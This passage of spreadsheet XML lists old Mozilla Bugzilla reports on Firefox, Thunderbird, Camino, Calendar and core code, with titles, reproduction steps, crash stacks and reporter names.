    <t>fleona</t>
  </si>
  <si>
    <t>FIREFOX-216170</t>
  </si>
  <si>
    <t>Send Page (as Link) omits query string</t>
  </si>
  <si>
    <t>The patch for bug 173954 is insufficient because the query string of the URL is
not passed to the mail client.  Many pages need the query string to return the
correct content.</t>
  </si>
  <si>
    <t>megabyte</t>
  </si>
  <si>
    <t>TOOLKIT-491774</t>
  </si>
  <si>
    <t>crashreporter fails to compile when doing 32-bit cross compile on Mac OS X 10.6 seed 10A335</t>
  </si>
  <si>
    <t>Created attachment 376118
mozconfig for reproducing v1.0
The crash reporter fails to compile when doing a 32-bit cross-compile on Mac OS X 10.6 where 64-bit is the default arch. Use the attached mozconfig and Mozilla trunk code to reproduce on Mac OS X 10.6 seed 10A335 (or later).
(No I am not using a PDP-11!)</t>
  </si>
  <si>
    <t>WEBSITES-432074</t>
  </si>
  <si>
    <t>Error: gotoURL is not defined</t>
  </si>
  <si>
    <t>Currently i get a lot of Error: gotoURL is not defined Errors when i go to the intlstore. Happen when i browse articels sign up etc :
Error: gotoURL is not defined
Source File: http://intlstore.mozilla.org/shopping_cart.php?sort=1a
Line: 1
Error: gotoURL is not defined
Source File: https://intlstore.mozilla.org//login.php
Line: 1
Error: gotoURL is not defined
Source File: https://intlstore.mozilla.org//create_account_success.php
Line: 1
Error: gotoURL is not defined
Source File: http://intlstore.mozilla.org/shopping_cart.php
Line: 1</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-162497</t>
  </si>
  <si>
    <t>broken link to ConfigPolicy.html</t>
  </si>
  <si>
    <t>The Configurable Security Policies link at http://mozilla.org/docs/end-user/
currently points to:
http://mozilla.org/projects/security/components/configPolicy.html
That URL returns a 404. The correct URL is:
http://mozilla.org/projects/security/components/ConfigPolicy.html
Isn't case sensitivity just wonderful?</t>
  </si>
  <si>
    <t>jonasj</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-247583</t>
  </si>
  <si>
    <t>Unable to build firefox 0.9 in linux</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 es-ES rv:1.7) Gecko/20040514
Build Identifier: Mozilla/5.0 (X11 U Linux i686 es-ES rv:1.7) Gecko/20040514
I've tried to build firefox 0.9 as in
http://www.mozilla.org/projects/firefox/build.html but after some minutes it fails
Reproducible: Always
Steps to Reproduce:
1. Download the ffox 0.9 source and uncompress
2. Checkout the mozilla/client.mk and mozilla/browser/config files
3. Create a .mozconfig file with just one line: .
$topsrcdir/browser/config/mozconfig
4. Run make -f client.mk build
Actual Results:  
After some minutes the build stops saying No rule to build the target 'export'
Expected Results:  
Finish the build successfully
It happens in debian woody but I've been told it happened to somebody else</t>
  </si>
  <si>
    <t>omgs</t>
  </si>
  <si>
    <t>CORE-4557</t>
  </si>
  <si>
    <t>PlatformVersionCheck() can fail to recreate base reg keys</t>
  </si>
  <si>
    <t>There is a section of code that looks like.
// This gets run when we upgrade the reg ver # or we start from an empty
rv = GetSubtree(Xpcom)
if(NS_FAIL(rv))
return rv
RemoveSubTree(XpCom)
AddSubtree(XpCom)
The problem is that if the XpCom GetSubtree fails (because the reg is empty or
incomplete) we exit out and won't nuke the Classes stuff or try to re-create the
XpCon keys.
Even if the GetSubtree fails we should still try to re-create the base keys.
The same goes for the Classes/CLSID stuff.
This code looks like it's isolated to PlatformVersionCheck()</t>
  </si>
  <si>
    <t>nicka</t>
  </si>
  <si>
    <t>FIREFOX_GRAVEYARD-494328</t>
  </si>
  <si>
    <t>Media file display names should use decodeURIComponent instead of decodeURI</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 6.0 en-GB rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4
Build Identifier: Mozilla/5.0 (Windows U Windows NT 6.0 en-GB rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4
Just nitpicking really since we're only displaying the filename of the media file there are no special characters to watch out for.
Reproducible: Always
Steps to Reproduce:
Open a podcast feed with files named like Episode #4 this will be encoded in the XML as Episode%20%234
Actual Results:  
Will display as Episode %234
Expected Results:  
Should display as Episode #4</t>
  </si>
  <si>
    <t>CORE-300030</t>
  </si>
  <si>
    <t>Refactor intrinsic width computation out of nsIFrame::Reflow</t>
  </si>
  <si>
    <t>This bug describes a design change that I've been talking about for a
while (see various posts to mozilla-layout).  Many bugs likely to be
fixed by this change have [reflow-refactor] in the Status Whiteboard.
I've been working on the changes on various REFLOW_{YYYYMMDD}_BRANCH
branches.
The basic idea to make two closely related changes at the same time:
 1. Change intrinsic width computation so that it happens in separate
    methods on nsIFrame.  (Currently preferred with calculation using
    the nsIFrame API can happen in two different ways as well:  having
    only one codepath reduces incremental layout ({inc}) bugs.)
 2. Change the way we handle incremental layout to use dirty bits on the
    frames rather than the reflow tree (which is essentially out-of-line
    dirty bits) and a complicated system of reflow reasons that often
    leads to weird incremental layout ({inc}) bugs.
I hope to add more details of the new design here in the near future.
Much of it is still open to change at this point the branch is close to
compiling and probably a ways from working so the cost of changing
things is still relatively low.</t>
  </si>
  <si>
    <t>SEAMONKEY-468740</t>
  </si>
  <si>
    <t>MailNews: Composition</t>
  </si>
  <si>
    <t>Text in compose window is deleted when attachment is openend</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 6.0 en-US rv:1.9.1b3pre) Gecko/20081129 SeaMonkey/2.0a2pre
Build Identifier: Mozilla/5.0 (Windows U Windows NT 6.0 en-US rv:1.9.1b3pre) Gecko/20081129 SeaMonkey/2.0a2pre
1. Write some text into a new email in Mail &amp; Newsgroup
2. Attach a file to the new email
3. Right-click on the attachment to open it
4. The text written in step 1 is deleted and you have to write it again
I don't understand why the email window is cleared when you open an attachment. Checking attachment before actually sending the message is completely normal. Nobody would expect that this action will also delete the message you just have written.
Reproducible: Always
Steps to Reproduce:
1. Write some text into a new email in Mail &amp; Newsgroup
2. Attach a file to the new email
3. Right-click on the attachment to open it
4. The text written in step 1 is deleted and you have to write it again
Actual Results:  
Attachment is openend but the message text is deleted.
Expected Results:  
Attachment is opened and the message remains.
I rated this a major bug because this behaviour is completely unexpected to most users and the text is really gone. You cannot get it back with Undo.</t>
  </si>
  <si>
    <t>mick22</t>
  </si>
  <si>
    <t>CALENDAR-462426</t>
  </si>
  <si>
    <t>Throbber icon not visible in Customize Toolbar dialog</t>
  </si>
  <si>
    <t>Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.1b2pre) Gecko/20081030 Calendar/1.0pre (BuildID: )
Steps to Reproduce:
1. Call menu View &gt; Toolbars &gt; Customize Toolbar...
2. Move the Throbber from the toolbar back to the Customize Toolbar dialog
Actual Results:
In the Customize Toolbar dialog the throbber looks like an unstyled windows button without icon and title.
Expected Results:
Throbber looks the same as in the toolbar.</t>
  </si>
  <si>
    <t>TESTING-382256</t>
  </si>
  <si>
    <t>masks is not defined in EventUtils.js</t>
  </si>
  <si>
    <t>A line is missing here.</t>
  </si>
  <si>
    <t>CORE-526214</t>
  </si>
  <si>
    <t>Firebug 1.5 crashes with Firefox 3.7</t>
  </si>
  <si>
    <t>Mozilla/5.0 (Windows U Windows NT 6.0 en-US rv:1.9.3a1pre) Gecko/20091102 Minefield/3.7a1pre (.NET CLR 3.5.30729)
Firebug 1.5X.0b1
The most recent update to 3.7a1pre for Window Vista had crash when Firebug is installed and its Script panel is enabled (immediately after Fx start).
Here is a crash report:
http://crash-stats.mozilla.com/report/index/f280dbfd-f54f-4af0-be62-ded362091103?p=1
http://crash-stats.mozilla.com/report/index/f280dbfd-f54f-4af0-be62-ded362091103?p=1
The crash doesn't happen if I remove compreg.dat file from the Firefox profile and start Firefpx. But it crashes again after I restart the next time.
Honza</t>
  </si>
  <si>
    <t>odvarko</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-297433</t>
  </si>
  <si>
    <t>On Mac OS X preview.png and icon.png in Firefox's classic.jar are not available when using the jar protocol</t>
  </si>
  <si>
    <t>I believe this is due to the way the icon.png and preview.png are packaged via
the build script. My reason for believing this is that I am able to extract
classic.jar zip it with the exact same structure using zip replace the
original classic.jar with this one and I am then able to access the icon.png
and preview.png using the jar protocol.
To reproduce try accessing jar:resource:///chrome/classic.jar!/icon.png with
Firefox on a Mac OS X system.</t>
  </si>
  <si>
    <t>FIREFOX-414257</t>
  </si>
  <si>
    <t>Stop searching for autocomplete results that won't be displayed</t>
  </si>
  <si>
    <t>No need to spend cycles on something we won't use. See bug 414229 comment 4 for more details.</t>
  </si>
  <si>
    <t>THUNDERBIRD-255234</t>
  </si>
  <si>
    <t>Send unsent messages... in context menu of unsent messages folder should not end with ...</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Win98 en-US rv:1.7) Gecko/20040626 Firefox/0.9.1
Build Identifier: Mozilla/5.0 (Windows U Win98 en-US rv:1.7) Gecko/20040626 Firefox/0.9.1
version 0.7.1 (20040626)
In the Local Folders when right-clicking the Unsent messages folder there is
an item called Send unsent messages... The three dots suggest that a dialog
box will appear to ask the user for more information but the action instead is
carried out immediately.
The three dots should be removed from the menu item. The Send unsent messages
item in the File menu does not have this error.
Last time I checked this was also present in the Mozilla suite as well.
Reproducible: Always
Steps to Reproduce:
1. Start Thunderbird.
2. Right-click the Unsent messages folder in Local Folders
Actual Results:  
Send unsent messages... item ends with three dots (elipses)
Expected Results:  
Send unsent messages... should not end with the dots since the action is
carried out immediately</t>
  </si>
  <si>
    <t>travisgevans</t>
  </si>
  <si>
    <t>THUNDERBIRD-351682</t>
  </si>
  <si>
    <t>Bump Branch Version Info to 2.0b1</t>
  </si>
  <si>
    <t>The Thunderbird alpha has been out for a while now we should start thinking about bumping the branch version to 2.0b1 for beta 1. When I do this I'll also have to tweak a setting o the build machines (cc'ing preed and rhelmer to keep them in the loop).
This will also impact extensions.</t>
  </si>
  <si>
    <t>TOOLKIT-583821</t>
  </si>
  <si>
    <t>Firefox Sync full syncs are really slow after SQLite3.7.0 upgrade</t>
  </si>
  <si>
    <t>STEPS TO REPRODUCE:
 0. Be using a profile that has lots of history (&gt; 5000 entries) and is set up with latest Firefox Sync experimental version (I'm using 1.4.3)
 1. Start Firefox
 2. Tools menu | Sync | Preferences
 3. (optional) For simplicity tell Sync to just synchronize your history (Minefield will: Use my custom settings in lowest drop-down menu
 4. Click Manage Account and then Reset Sync
 5. Choose the bottom option Replace all other devices with your local data
 6. Click Next Next and then trigger a sync.
ACTUAL RESULTS: The sync hangs for at least a minute on my machine apparently while querying my local history.
REGRESSION RANGE (using .txt files in nightly download dirs):
20100723031340 58101a16aff7
20100724030057 30239e4cebd8
http://hg.mozilla.org/mozilla-central/pushloghtml?fromchange=58101a16aff7&amp;tochange=30239e4cebd8
This includes both a places change related to history (Bug 580228) as well as a sqlite upgrade (Bug 581000).  Filing in Places right now but it may very well be a sqlite/storage issue.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-18788</t>
  </si>
  <si>
    <t>cascading bounce messages</t>
  </si>
  <si>
    <t>my mail account is paralyzed from the hundreds of bounce messages i'm getting
from gila. Attempting to look at them makes my mail reader seize up. I think
what's happening is that obob is down so mail to staff bounces messages to dmose
and shaver. Since dmose is postmaster the bounce mail can't be delivered which
gnerates more bounces etc etc... I removed dmose from the postmaster alias on
gila. I would cc dmose but i don't want to make things worse.</t>
  </si>
  <si>
    <t>CORE-115157</t>
  </si>
  <si>
    <t>Shrink content data structures</t>
  </si>
  <si>
    <t>We can save 12 bytes per SheetLoadData (not that we make many of these I think)</t>
  </si>
  <si>
    <t>CALENDAR-245123</t>
  </si>
  <si>
    <t>Menu Go Previous Go Next don't work</t>
  </si>
  <si>
    <t>The Go menu Previous and Next commands don't work.</t>
  </si>
  <si>
    <t>CORE-34473</t>
  </si>
  <si>
    <t>Endless loop of Gdk-CRITICAL messages on stdout</t>
  </si>
  <si>
    <t>Starting with the 4/4 build on doing anything with a menu or entering
(focusing) a window I'm getting an endless loop of:
Gdk-CRITICAL **: file gdkgc.c: line 288 (gdk_gc_unref): assertion `gc != NULL'
failed.
repeating about twice a second.</t>
  </si>
  <si>
    <t>CORE-219504</t>
  </si>
  <si>
    <t>Consumption of script element ends at wrong end-tag</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.5b) Gecko/20030827
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.5b) Gecko/20030827
Under IE page is rendered as a compact orderly placement. Under Mozilla page
elements are rendered more or less one after another vertically starting from
top to bottom each taking up a separate horizontal area. Leaves a lot of white
space and loses generel page organization of left sidebar with body text to the
right.
Reproducible: Always
Steps to Reproduce:
1. type in URL
2. view poorly spaced elements in long vertical presentation
3.
Actual Results:  
Page with bad layout: sidebar elements followed vertically by body text and pix
followed by more sidebar elements
Expected Results:  
Lay out with left side bar at left and body text at right of sidebar</t>
  </si>
  <si>
    <t>rr_mozilla</t>
  </si>
  <si>
    <t>CORE-471285</t>
  </si>
  <si>
    <t>Workers: Spec for runtime error behavior has changed</t>
  </si>
  <si>
    <t>Created attachment 354571
Patchv1
Small changes to runtime errors have been introduced into the spec see http://www.whatwg.org/specs/web-workers/current-work/#runtime
Patch attached.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-315150</t>
  </si>
  <si>
    <t>upload still uses dispatchDOMActivate</t>
  </si>
  <si>
    <t>upload needs to be changed to use dispatchDOMUIEvent('DOMActivate') like the other controls do.  dispatchDOMActivate doesn't exist anymore.</t>
  </si>
  <si>
    <t>CORE-119240</t>
  </si>
  <si>
    <t>Userlist etc. should auto update after rezizing sidebar</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows U Win98 en-US rv:0.9.7+) Gecko/20020104
BuildID:    2002010403
The Userlist in the sidebar panel shortens long usernames and adds ... after
such a name when it will not fit in de current sidebar width. After resizing the
sidebar (i.e. making it wider) usernames should automatically redraw with less
nicknames shortend and added ...
Reproducible: Always
Steps to Reproduce:
1. Open URL above
2. Resize sidebar to approx. 15 cm wide usernames
3. click on the moznet tab in the sidebar (no auto redraw is done)
4. click on the #mozillazine tab
5. Userlist is redrawn with shortened username and added ...
6. Resize to wider sidebar (again no automatic redraw)
Actual Results:  No auto redraw on the userlist
Expected Results:  Userlist should auto redraw to redisplay (and shorten)
usernames to current width.</t>
  </si>
  <si>
    <t>b.j.w.van.duijnhoven</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-495232</t>
  </si>
  <si>
    <t>Drop support for the Palm Sync Extension</t>
  </si>
  <si>
    <t>It has been a few days since I posted and I've not heard any negative comments about dropping support for Palm Sync so I think its time to do it.
I have archived the code under a repo in my users directory:
http://hg.mozilla.org/users/bugzilla_standard8.plus.com/palmsync/
and added a readme.txt with some information about it.
I'll be filing a separate bug on archiving the palm sync component.</t>
  </si>
  <si>
    <t>FIREFOX-265456</t>
  </si>
  <si>
    <t>Still possible to focus textbox in background tab by using createevent</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7.3) Gecko/20041020 Firefox/1.0
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7.3) Gecko/20041020 Firefox/1.0
I see that bug 124750 is fixed on the branch.
But it is still possible to focus a textarea in a background tab see the URL
testcase. It consists of the following code:
textevil textarea
function doe(){
var x=document.getElementsByTagName('label')[0]
var me = document.createEvent(MouseEvents)
me.initMouseEvent('click'11window0000000000x)
x.dispatchEvent(me)
}
setInterval('doe()'1000)
Reproducible: Always
Steps to Reproduce:
1. Open the url testcase in a background tab
2. Focus a textbox in this page
3.
Actual Results:  
Watch the caret disappear in one second or less
Expected Results:  
The caret should stay in the textbox.</t>
  </si>
  <si>
    <t>CORE-460176</t>
  </si>
  <si>
    <t>Maximizing youtube video causes seamonkey to hang using flash 10</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9.1b2pre) Gecko/20081014 SeaMonkey/2.0a2pre
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9.1b2pre) Gecko/20081014 SeaMonkey/2.0a2pre
After installing Flash 10 and going to youtube seamonkey hung the browser when I tried to maximize the video.
Reproducible: Always
Steps to Reproduce:
1.Install Flash 10
2.Go to Youtube and view a video
3.Try to maximize the video to full screen
Actual Results:  
When I clicked the maximize video button Seamonkey hung and I had to force close the browser
Expected Results:  
The video should have maximized.
When using flash 9 and seamonkey I do not have this problem.  Also I do not have this problem on Firefox 2.  I'm using Fedora 8.</t>
  </si>
  <si>
    <t>bwp6</t>
  </si>
  <si>
    <t>BUGZILLA-365525</t>
  </si>
  <si>
    <t>Periods in wrong place in relation to parentheses</t>
  </si>
  <si>
    <t>part of the CVS root.). Leave this blank if you have no  _</t>
  </si>
  <si>
    <t>CORE-615617</t>
  </si>
  <si>
    <t>GetDocumentMetadata does not return data from META elements added by scripts (breaks jQuery Mobile)</t>
  </si>
  <si>
    <t>nsDOMWindowUtils::GetDocumentMetadata (which uses nsIDocument::GetHeaderData) does not return any values from  nodes inserted with JavaScript.
For example http://jquerymobile.com/demos/1.0a2/ inserts a  element into the .  Fennec receives a DOMMetaAdded event when the element is inserted but GetDocumentMetadata does not return the added values.</t>
  </si>
  <si>
    <t>CORE-241296</t>
  </si>
  <si>
    <t>Add /usr/lib for libatk-bridge.so searching</t>
  </si>
  <si>
    <t>In LoadGtkModule mozilla use PR_GetLibraryPath to get library searching path.
But  the return value of PR_GetLibraryPath is actually value of
LD_LIBRARY_PATH. If LD_LIBRARY_PATH is not set mozilla can't find
gtk-2.0/modules/libatk-bridge.so under default library path /usr/lib.</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-365942</t>
  </si>
  <si>
    <t>AMO Localization (ja)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1
Build Identifier: 
Here's the Japanese gettext for AMO.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>kohei.yoshino</t>
  </si>
  <si>
    <t>BUGZILLA-486118</t>
  </si>
  <si>
    <t>The Bugzilla changelog doesn't list the new 3.4 branch</t>
  </si>
  <si>
    <t>We need a new column in the changelog table for the 3.4 branch to track checkins on this specific branch.</t>
  </si>
  <si>
    <t>CORE-199755</t>
  </si>
  <si>
    <t>Input type=submit/button form field CSS font-family style reverts to default when mouse [hovered over | clicked on]  it.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.3) Gecko/20030312
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.3) Gecko/20030312
The 'Add New Item' button (of the attached html file) should not revert to the
default font for form buttons when the mouse hover's over it.
The problem disappears if I remove the: 
    .menutext:hover { text-decoration: underline } 
style element.
I am unsure whether this is a correct CSS attribute for a SELECT
object but the text of the button does actually change to underline
even when the font is reset.
Reproducible: Always
Steps to Reproduce:
The attached HTML page is all that is required to reproduce the problem.  Open
the page using a 1.3 copy of mozilla.  (I have not tried on other versions). 
Move the mouse over the 'Add New Item' button.
Actual Results:  
The 'Add New Item' button resizes to the same font as the 'Search' button even
though the 'Add New Item' is of a different class.
Expected Results:  
The button should have stayed in the font specified for the menutext CSS class.</t>
  </si>
  <si>
    <t>jasonpell</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-277329</t>
  </si>
  <si>
    <t>nsIMenu.h need not include nsIDocShell.h</t>
  </si>
  <si>
    <t>nsIDocShell is only used as an argument as a pointer. hence a forward
declaration should suffice:
  class nsIDocShell</t>
  </si>
  <si>
    <t>CORE-285188</t>
  </si>
  <si>
    <t>nsFrameLoader::GetDocShell should not throw if it can create the docshell</t>
  </si>
  <si>
    <t>Right now part of our recursion protection is in nsFrameLoader::EnsureDocShell.
 This means that GetDocShell can throw for no really good reason (and if this
happens during frame construction the document the frame is in will suddenly
have no presentation at best or crash at worst).
I'm going to move all the recursion checking into a single method that's called
from LoadFrame().  Throwing from that method is fine.</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-386966</t>
  </si>
  <si>
    <t>Fix testopia description</t>
  </si>
  <si>
    <t>Testopia's description said managment - I fixed it when I changed it and all other products to not automatically confirm bugs.</t>
  </si>
  <si>
    <t>THUNDERBIRD-369009</t>
  </si>
  <si>
    <t>new profile with MCD still pops up new account wizard</t>
  </si>
  <si>
    <t>Created attachment 253666
proposed fix - make sure no accounts are already set up
Even if MCD sets up an account on launch w/ a new profile we still pop up the account wizard. This is because I forgot to land a fix from the 1.0 branch onto the trunk or 2.0 (the trunk code line's last change date was from before the branch change). Patch upcoming</t>
  </si>
  <si>
    <t>FIREFOX-316302</t>
  </si>
  <si>
    <t>Whitespace removal and some small cruft</t>
  </si>
  <si>
    <t>While translating the FF and TB files I encountered some irregularities on how the files are structured.  I have made some patches about this.  Mainly they remove unnecassary whitespace introduce newlines at end of files correct some comments and reorder some lines in particular files.
No harm is done if they are applied no harm is done if they arenâ€™t either.</t>
  </si>
  <si>
    <t>CORE-158003</t>
  </si>
  <si>
    <t>custom static constructors for uconv converters</t>
  </si>
  <si>
    <t>after fixing bug 157993 I think I'll have a way to shrink the i18n libraries
significantly
The problem is basically that almost all of the converter classes contain no
actual code - they just map to a generated in-memory table. We have the overhead
of a class which derives from a shared base class
basically we have something like this:
class nsUnicodeToFoo : nsBaseEncoder {
  nsUnicodeToFoo() : nsBaseEncoder(table1 ...) {}
}
and then later declare a constructor
NS_GENERIC_FACTORY_CONSTRUCTOR(nsUnicodeToFoo)
and then put
nsUnicodeToFooConstructor in the generic module header.
Here's what we can do instead:
for each class we instead ditch the actual class and just write a custom
constructor:
nsUnicodeToFooConstructor() {
  return CreateBaseEncoder(g_FooTable ...)
}
and allow all constructors to share a common constructor:
CreateBaseEncoder(table ...) {
  return new nsBaseEncoder(table...)
}
then nsUnicodeToFooConstructor will be much smaller.</t>
  </si>
  <si>
    <t>CALENDAR-698760</t>
  </si>
  <si>
    <t>Calendar Views UI freshening</t>
  </si>
  <si>
    <t>I have some cool new colors and style changes for the calendar views coming up. This gives Lightning 1.0 the extra kicks and makes it look delicious!</t>
  </si>
  <si>
    <t>FIREFOX-272463</t>
  </si>
  <si>
    <t>Help Contents menu item disappears when no windows are open</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.7.5) Gecko/20041107 Firefox/1.0
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.7.5) Gecko/20041107 Firefox/1.0
When all windows are closed the Help Contents menu item disappears from the
Help menu leaving behind the rest of the menu.
Reproducible: Always
Steps to Reproduce:
1. Close all windows.
2. Click on the Help menu.
Actual Results:  
There is no Help Contents menu item.
Expected Results:  
The Help menu should remain the same or if the Help Contents isn't suppose to be
there then the first separator should be removed.</t>
  </si>
  <si>
    <t>netknightx</t>
  </si>
  <si>
    <t>FIREFOX-359682</t>
  </si>
  <si>
    <t>don't check gBrowser's localname</t>
  </si>
  <si>
    <t>Since it's now always a tabbrowser... I think this code dates back to when there wasn't a tabbrowser.</t>
  </si>
  <si>
    <t>CORE-455393</t>
  </si>
  <si>
    <t>Remove v1 string ABI compatibility code</t>
  </si>
  <si>
    <t>Created attachment 338725
remove v1 string ABI compatibility code rev. 1
We have a fair bit of code to support the v1 string ABI (the one from the Mozilla 1.4 SDK which was made obsolete in Mozilla 1.7). We turned this off by default for FF3 and we should just remove this code now because it can be very confusing to identify which method signature is being called.
The attached patch has been tested through the tryserver. Most of this is a no-op removal of the old ifdefed code. There is one significant change: I have removed the nsTAString_CharT type which is not actually defined to nsAString and moved the relevant typedefs to nsTSubstring which is the new nsAString.</t>
  </si>
  <si>
    <t>THUNDERBIRD-321303</t>
  </si>
  <si>
    <t>Some text invisible when composing (spell-while-you-type with non-default dictionary)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 fr rv:1.8) Gecko/20051111 Firefox/1.5
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 fr rv:1.8) Gecko/20051111 Firefox/1.5
When I transferred message the text and bakground are white. I can't read text.
For read the text I must on-line it.
Reproducible: Always
Steps to Reproduce:
1. I have Thunderbird version 1.5 (20051201) with Spell-fr-FR.xpi dictionary
2. I open a recieve mail and I click on transfert.
3. I can't read text because the color of text is white.</t>
  </si>
  <si>
    <t>arawns</t>
  </si>
  <si>
    <t>NSS-430369</t>
  </si>
  <si>
    <t>vfychain -o succeeds even if -pp is not specified</t>
  </si>
  <si>
    <t>The -o option is used to pass in a specific policy OID that we want to check against the chain. The --p option is used to invoke the new PKIX API.
If --p is omitted CERT_VerifyCertificate is invoked and the policy OID is actually ignored making it seem like the verification succeeded. This is not the case. The -o without --p combination should always fail preferably with a usage error.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-239217</t>
  </si>
  <si>
    <t>History</t>
  </si>
  <si>
    <t>Camino crashes when I click on history while in bookmarks or from View&gt;Show History</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.7b) Gecko/20040330 Camino/0.7+
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.7b) Gecko/20040330 Camino/0.7+
OS 10.3.3 although a web page is displayed the web page does not appear to be
a factor in this occurrence as it has happened while on several different web
sites.  When I click on bookmarks and then history the spinning beachball
appears and the Camino unexpectedly quits.  The same thing happens if I click
on view&gt;show history.  I relaunched Camino and obtaine the same result on four
consecutive occasions prior to filing this report.  I had noticed the same thing
on the previous day's build but am unable to provide a date before which this
did not occur.
Reproducible: Always
Steps to Reproduce:
1.Launch Camino
2.click on bookmarks
3.click on history in left hand column
or
1. Launch Camino
2. click on View 
3. click on Show History
Actual Results:  
In each instance the spinning beachball appears and then Camino crashes
(Camino disappears and a window stating that Camino has quit unexpectly appears
and offers an opportunity to submit a report to Apple.
Expected Results:  
The browser should have displayed a list of web sites that it had been to.
Camino is in its unmodified state.  No themes/skins/whatever are installed.
There are a large number of bookmarks kept in this browser which have been the
subject of a prior bug report about the slow loading of the bookmarks.</t>
  </si>
  <si>
    <t>rbriscoe</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-215284</t>
  </si>
  <si>
    <t>move Doctor from tegu to rheet</t>
  </si>
  <si>
    <t>Doctor needs to be moved to rheet as part of the process of transitioning
mozilla.org to the Mozilla Foundation.  Preliminary work can be done now but
rheet needs to land in its new colo space before the final switch is flipped.</t>
  </si>
  <si>
    <t>CORE-638756</t>
  </si>
  <si>
    <t>Crash in nsWindow::HandleScrollingPlugins when using the mouse wheel and with the Elantech hack enabled [@ nsWindow::HandleScrollingPlugins ][@ _SEH_prolog4 ][@ nsWindow::ProcessMessage(unsigned int unsigned int&amp; long&amp; long*) ][@ FindNCHit ]</t>
  </si>
  <si>
    <t>+++ This bug was initially created as a clone of Bug #531341 +++
Thunderbird 3.3 trunk builds beginning with 20110213030010. all win7
I haven't checked firefox.
bp-3944e872-909f-40aa-9352-bb7a22110222
EXCEPTION_ACCESS_VIOLATION_READ
0x4400e8
2 finger swipe scrolling down leads to this crash. Elantech Smart-Pad 8.0.7.0 drivers
0	xul.dll	nsWindow::HandleScrollingPlugins	widget/src/windows/nsWindow.cpp:7936
1	xul.dll	nsWindow::OnMouseWheel	widget/src/windows/nsWindow.cpp:6700
2	xul.dll	nsWindow::ProcessMessage	widget/src/windows/nsWindow.cpp:5569
3	xul.dll	nsWindow::WindowProcInternal	widget/src/windows/nsWindow.cpp:4616
4	xul.dll	CallWindowProcCrashProtected	xpcom/base/nsCrashOnException.cpp:65
5	xul.dll	nsWindow::WindowProc	widget/src/windows/nsWindow.cpp:4563
6	user32.dll	user32.dll@0x162f9	
7	user32.dll	user32.dll@0x16d39	
8	user32.dll	user32.dll@0x177c3	
9	user32.dll	user32.dll@0x17889	
10	xul.dll	nsAppShell::ProcessNextNativeEvent	widget/src/windows/nsAppShell.cpp:339
11	xul.dll	nsBaseAppShell::DoProcessNextNativeEvent	widget/src/xpwidgets/nsBaseAppShell.cpp:173</t>
  </si>
  <si>
    <t>cam</t>
  </si>
  <si>
    <t>TOOLKIT-285196</t>
  </si>
  <si>
    <t>Save Link As downloads corrupted MP3 media files (Zone Alarm related)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.6) Gecko/20050223 Firefox/1.0.1 StumbleUpon/1.9992
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.6) Gecko/20050223 Firefox/1.0.1 StumbleUpon/1.9992
This is an issue appeared in the last 8 months. In June/2004 I downloaded
multiple MP3 files successfully using Firefox's Save Link As command. 
With ZoneAlarm up/running and using Firefox's {right click}/Save Link As
option the MP3 file downloaded is corrupted. The file will not play properly
the file size is incorrect and the MPEG file information (Artist Album Name
etc) is truncated. 
If I {left click}/select the same webpage link from Firefox and play the
selection directly from the webpage the MP3 is downloaded to the local TEMP
directory and plays properly. The MPEG file information is also complete. 
This problem occurs only with Firefox. Attempting the exact same procedure
({right click}/Save Target As) in Internet Explorer 6 (IE Ver
5.1.2600.2180/SP2) downloads the MP3 file intact. The MP3 file plays properly
and all MPEG information is undamaged.
With the two MP3 sites I've tested the MP3 files being downloaded are actually
coming from a domain name DIFFERENT from the webpage being viewed. Clearing ALL
ZoneAlarm Privacy Settings checkboxes to allow unrestricted access for the
